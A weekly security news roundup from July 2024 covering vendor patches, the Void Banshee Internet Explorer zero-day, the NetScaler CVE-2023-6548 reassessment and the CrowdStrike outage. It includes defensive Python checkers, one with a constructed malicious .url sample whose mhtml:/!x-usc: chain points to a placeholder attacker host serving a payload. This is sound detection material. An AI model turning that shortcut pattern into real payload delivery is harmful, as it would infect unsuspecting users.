Weekly Security News - 22nd July 2024

Huge CrowdStrike outage on Windows, attacks on Windows and NetScaler and 240 Oracle vulnerabilities patched... all in this week's security news...

Welcome to this week’s Security News. We’ve collated the best articles from around the internet and put them all into one place. If you have any queries or concerns about anything in this week’s news, then please get in touch with our team who can advise further. For our existing clients, if we believe anything may affect your organisation, our team will be in touch directly.

Vulnerabilities and Patches

Cisco Releases Security Advisories for Multiple Products

Cisco has released advisories covering multiple products, addressing two critical, three high and four medium severity vulnerabilities. The two critical vulnerabilities are CVE-2024-20419 and CVE-2024-20401.

  • CVE-2024-20419 affects Cisco Smart Software Manager (SSM) On-Prem, has a CVSSv3 score of 10.0 and could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. The flaw is due to an improper implementation of the password-change process, so an attacker needs no existing credentials to take over an account.
  • CVE-2024-20401 affects Cisco Secure Email Gateway, has a CVSSv3 score of 9.8 and could allow an unauthenticated, remote attacker to overwrite arbitrary files on the underlying operating system (OS) by sending a crafted email attachment. The device is only exposed when the file analysis (Advanced Malware Protection) or content filter feature is enabled and assigned to an incoming mail policy. Successful exploitation could allow an attacker to add users with root privileges, modify the device configuration, execute arbitrary code, or cause a permanent denial-of-service (DoS) that requires manual intervention to recover from.

Additionally, two earlier advisories were updated: the one for regreSSHion (CVE-2024-6387, the OpenSSH server remote code execution flaw) and the one for Blast-RADIUS (CVE-2024-3596, spoofing of RADIUS protocol responses).

Oracle Patches 240 Vulnerabilities With July 2024 CPU

Oracle on Tuesday announced 386 new security patches as part of its July 2024 Critical Patch Update (CPU), including over 260 for unauthenticated, remotely exploitable vulnerabilities. The headline figure of 240 counts distinct CVEs; Oracle's figure of 386 counts individual patches, since a single CVE is frequently fixed across several product families. Patches per product family, with the number that are remotely exploitable without authentication in brackets:

  • Financial Services Applications: 60 (44)
  • Fusion Middleware: 41 (32)
  • MySQL: 37 (11)
  • Communications Applications: 20 (14)
  • Analytics: 17 (12)
  • Siebel CRM: 12 (11)
  • PeopleSoft: 11 (3)
  • Insurance Applications: 10 (7)
  • E-Business Suite: 10 (2)
  • JD Edwards: 8 (6)
  • Database Server: 8 (3)
  • Commerce: 7 (7)
  • Java SE: 7 (7)
  • Supply Chain: 7 (5)

Other Oracle products that received patches include Application Express, Essbase, GoldenGate, NoSQL Database, REST Data Services, TimesTen In-Memory Database, Construction and Engineering, Enterprise Manager, HealthCare Applications, Hyperion, Retail Applications, Systems, Utilities Applications, and Virtualization.

SolarWinds Patches 11 Critical Flaws in Access Rights Manager Software

SolarWinds has addressed a set of critical security flaws impacting its Access Rights Manager (ARM) software that could be exploited to access sensitive information or execute arbitrary code.

Of the 11 vulnerabilities, seven are rated Critical in severity and carry a CVSS score of 9.6 out of 10.0. The remaining four weaknesses have been rated High in severity, with each of them having a CVSS score of 7.6.

The most severe of the flaws are listed below –

  • CVE-2024-23472 – SolarWinds ARM Directory Traversal Arbitrary File Deletion and Information Disclosure Vulnerability
  • CVE-2024-28074 – SolarWinds ARM Internal Deserialization Remote Code Execution Vulnerability
  • CVE-2024-23469 – SolarWinds ARM Exposed Dangerous Method Remote Code Execution Vulnerability
  • CVE-2024-23475 – SolarWinds ARM Traversal and Information Disclosure Vulnerability
  • CVE-2024-23467 – SolarWinds ARM Traversal Remote Code Execution Vulnerability
  • CVE-2024-23466 – SolarWinds ARM Directory Traversal Remote Code Execution Vulnerability
  • CVE-2024-23471 – SolarWinds ARM CreateFile Directory Traversal Remote Code Execution Vulnerability

Cyber Attacks

APT Exploits Windows Zero-Day to Execute Code via Disabled Internet Explorer

An advanced persistent threat (APT) actor known as Void Banshee has exploited a recent Windows zero-day to execute code through the disabled Internet Explorer, Trend Micro explains. The vulnerability, tracked as CVE-2024-38112 (CVSS score of 7.5), was addressed with the July 2024 Patch Tuesday updates, roughly two months after Trend Micro discovered it in the wild and reported it to Microsoft.

Void Banshee, a threat actor targeting entities in North America, Europe and South Asia for information theft and financial gain, exploited CVE-2024-38112 as a zero-day to infect victims with the Atlantida stealer, a malware family first seen in January 2024. In the observed attacks, the APT delivered internet shortcut (.url) files whose URL field abused the MHTML (MIME Encapsulation of Aggregate HTML Documents) protocol handler together with an x-usc directive, so that the link opened in Windows’ disabled Internet Explorer (IE) rather than the default browser, and code then executed through IE’s MSHTML engine. Because IE is no longer maintained and the shortcut looks like an ordinary link, detection should focus on .url files whose URL value starts with mhtml: or contains !x-usc:, and on unexpected iexplore.exe launches on hosts where IE is disabled.
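The following is an added example (not code from Trend Micro, Microsoft or the original article) showing how the shortcut-file pattern described above can be checked for. It parses the INI-style contents of a .url file and flags the mhtml: prefix and !x-usc: directive chain; the shortcut contents and the attacker.example hostname are constructed samples, not real indicators.

```python
"""Flag Windows Internet Shortcut (.url) files that use the mhtml: handler and
!x-usc: directive chain described for CVE-2024-38112.

This is an added example, not code from Trend Micro, Microsoft or the original
article. The shortcut contents and hostnames below are constructed samples.
"""
import configparser
import re
from typing import Dict, List

# Constructed sample: an ordinary shortcut, nothing to report.
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.com/
IconIndex=0
"""

# Constructed sample modelled on the abuse pattern: the mhtml: prefix routes the
# link to the legacy IE/MSHTML path and !x-usc: redirects it to a second
# location. attacker.example is a placeholder, not a real indicator.
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=mhtml:http://attacker.example/lure!x-usc:http://attacker.example/payload
IconIndex=13
"""

MHTML_RE = re.compile(r"^\s*mhtml:", re.IGNORECASE)
XUSC_RE = re.compile(r"!x-usc:", re.IGNORECASE)


def parse_url_file(text: str) -> Dict[str, str]:
    """Return the [InternetShortcut] section of a .url file as a lower-cased dict.

    .url files are INI formatted. Only '=' is accepted as a delimiter so the ':'
    inside the URL value is left alone; malformed input yields an empty dict.
    """
    parser = configparser.RawConfigParser(delimiters=("=",), strict=False)
    try:
        parser.read_string(text)
    except configparser.Error:
        return {}
    if not parser.has_section("InternetShortcut"):
        return {}
    return {k.lower(): v for k, v in parser.items("InternetShortcut")}


def extract_targets(url: str) -> List[str]:
    """Split an mhtml:...!x-usc:... value into the individual URLs it chains."""
    stripped = MHTML_RE.sub("", url)
    return [part for part in XUSC_RE.split(stripped) if part]


def scan_url_file(text: str) -> List[str]:
    """Return human-readable findings for one .url file (empty list if clean)."""
    findings: List[str] = []
    url = parse_url_file(text).get("url", "")
    uses_mhtml = bool(MHTML_RE.search(url))
    uses_xusc = bool(XUSC_RE.search(url))
    if uses_mhtml:
        findings.append("URL uses the mhtml: protocol handler (forces the legacy IE/MSHTML path)")
    if uses_xusc:
        findings.append("URL contains an !x-usc: directive (redirects to a second location)")
    if uses_mhtml and uses_xusc:
        targets = ", ".join(extract_targets(url))
        findings.append(f"mhtml: + !x-usc: chain matches the CVE-2024-38112 abuse pattern; targets: {targets}")
    return findings


if __name__ == "__main__":
    for name, content in (("benign.url", BENIGN_URL_FILE), ("invoice.url", SUSPICIOUS_URL_FILE)):
        results = scan_url_file(content)
        print(f"{name}: {'clean' if not results else ''}")
        for line in results:
            print(f"  - {line}")
```

Run it over .url files collected from mail attachments or user download folders; a patched host is no longer exploitable, but the presence of such a file still indicates a delivery attempt worth triaging.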

Exploited Unauthenticated RCE Vulnerability CVE-2023-6548 in Citrix NetScaler ADC and NetScaler Gateway

The NHS England National Cyber Security Operations Centre (CSOC) is aware of intelligence provided by CrowdStrike that, contrary to Citrix’s initial disclosure, the vulnerability known as CVE-2023-6548 does not require user privileges for exploitation. NHS England National CSOC now assesses CVE-2023-6548 as a critical vulnerability that can allow a remote, unauthenticated attacker to execute code on a vulnerable NetScaler Gateway or NetScaler ADC appliance.

CVE-2023-6548 has two different CVSSv3 scores attributed to it: the NIST National Vulnerability Database (NVD) rates it 8.8, while Citrix rates it 5.5. The weakness is Improper Control of Generation of Code (‘Code Injection’) in NetScaler ADC and NetScaler Gateway, and it is reachable only through the management interface (an NSIP, CLIP or SNIP with management access enabled). Citrix’s standing guidance is that traffic to the management interface should be separated, physically or logically, from normal network traffic and never exposed to the internet; an appliance whose management interface is reachable from untrusted networks is the case where this reassessment matters most.

Because of the change in severity, affected organisations must update to the most recent version available, which for July 2024 is:

  • 14.1 build 25.56
  • 13.1 build 53.24
  • 13.0 build 92.31
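To turn the build list above into a check, the following added example (not Citrix or NHS England tooling) parses the banner that the NetScaler CLI prints for `show version` and compares it with the fixed builds listed for each release branch. The banner strings are constructed samples in that format; the fixed-build table is taken from the list above.

```python
"""Decide from a NetScaler `show version` banner whether an ADC or Gateway is at
or above the fixed builds listed above for CVE-2023-6548.

This is an added example, not Citrix or NHS England tooling. The banner strings
are constructed samples in the format the NetScaler CLI prints; the fixed-build
table is taken from the list above.
"""
import re
from typing import Dict, Optional, Tuple

# (major, minor) release branch -> (build, sub-build) that contains the fix, per the list above.
FIXED_BUILDS: Dict[Tuple[int, int], Tuple[int, int]] = {
    (14, 1): (25, 56),
    (13, 1): (53, 24),
    (13, 0): (92, 31),
}

# Matches e.g. "NetScaler NS13.1: Build 53.17.nc, Date: ..." -> 13, 1, 53, 17
BANNER_RE = re.compile(r"NS(\d+)\.(\d+):\s*Build\s+(\d+)\.(\d+)")

# Constructed sample banners, one per situation the check has to handle.
SAMPLE_BANNERS = [
    "NetScaler NS13.1: Build 53.17.nc, Date: Jun 18 2024, 10:22:31   (64-bit)",
    "NetScaler NS14.1: Build 25.56.nc, Date: Jul 18 2024, 09:41:07   (64-bit)",
    "NetScaler NS13.0: Build 92.21.nc, Date: May 14 2024, 14:05:55   (64-bit)",
    "NetScaler NS12.1: Build 65.39.nc, Date: Apr 10 2024, 11:30:12   (64-bit)",
]


def parse_banner(banner: str) -> Optional[Tuple[int, int, int, int]]:
    """Extract (major, minor, build, sub) from a `show version` line, or None if absent."""
    match = BANNER_RE.search(banner)
    if match is None:
        return None
    major, minor, build, sub = (int(g) for g in match.groups())
    return major, minor, build, sub


def assess(banner: str) -> str:
    """Classify a banner as 'patched', 'vulnerable', 'unsupported-branch' or 'unparseable'."""
    parsed = parse_banner(banner)
    if parsed is None:
        return "unparseable"
    major, minor, build, sub = parsed
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        # Branches not in the list above (e.g. 12.1, which is end of life) cannot be cleared by this check.
        return "unsupported-branch"
    # Tuple comparison orders by build first, then sub-build: 53.24 >= 53.24, 53.17 < 53.24.
    return "patched" if (build, sub) >= fixed else "vulnerable"


if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(f"{assess(banner):18s} {banner}")
```

FIPS and NDcPP builds on the 12.1 and 13.1 branches use their own build numbering and have their own fixed builds in Citrix’s advisory, which are not listed above; this check would report such a 13.1 build as vulnerable because its build number is lower, so treat the result as applying to standard builds only.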

In Other News...

Microsoft IT outage linked to cyber security firm CrowdStrike hits airlines, railways, NHS, and media outlets globally

A faulty CrowdStrike Falcon sensor content update (Channel File 291) is crashing computers running Windows, leaving them at the Blue Screen of Death; despite the headline, the fault lay in CrowdStrike’s update rather than in a Microsoft product. Affected machines crash again on each restart, so companies around the world have been unable to recover simply by rebooting, according to reports. Businesses including banks, airlines, railways, telecommunications companies, TV and radio broadcasters and supermarkets have been taken offline after blue screen error messages appeared on Windows workstations across the globe. Britain’s biggest train company has warned passengers to expect disruption due to “widespread IT issues”. Govia Thameslink Railway – parent company of Southern, Thameslink, Gatwick Express and Great Northern – issued an alert on its social media channels. The NHS booking system used by doctors in England is offline, medical officials said on X. Firms affected by the outage include Sky News, which has been unable to broadcast. Sky News in the UK reported being off air this morning, with Sky News sports presenter Jacquie Beltrao posting on X: “We’re obviously not on air – we’re trying.” Sky News is still down, according to a message on its website. The London Stock Exchange is also facing technical issues. CrowdStrike’s published remediation for hosts that do not recover on their own is to boot into Safe Mode or the Windows Recovery Environment and delete the C-00000291*.sys file from C:\Windows\System32\drivers\CrowdStrike, a step that on disk-encrypted endpoints requires the BitLocker recovery key and therefore hands-on effort per machine.

Kaspersky Exits U.S. Market Following Commerce Department Ban

Russian security vendor Kaspersky has said it’s exiting the U.S. market nearly a month after the Commerce Department announced a ban on the sale of its software in the country, citing a national security risk. News of the closure was first reported by journalist Kim Zetter. The company is expected to wind down its U.S. operations on July 20, 2024, the same day the ban comes into effect. It’s also expected to lay off fewer than 50 employees in the U.S. “The company has carefully examined and evaluated the impact of the U.S. legal requirements and made this sad and difficult decision as business opportunities in the country are no longer viable,” the company said in a statement. In late June 2024, the Commerce Department said it was enforcing a ban after what it said was an “extremely thorough investigation.” The company was also added to the Entity List, preventing U.S. enterprises from conducting business with it.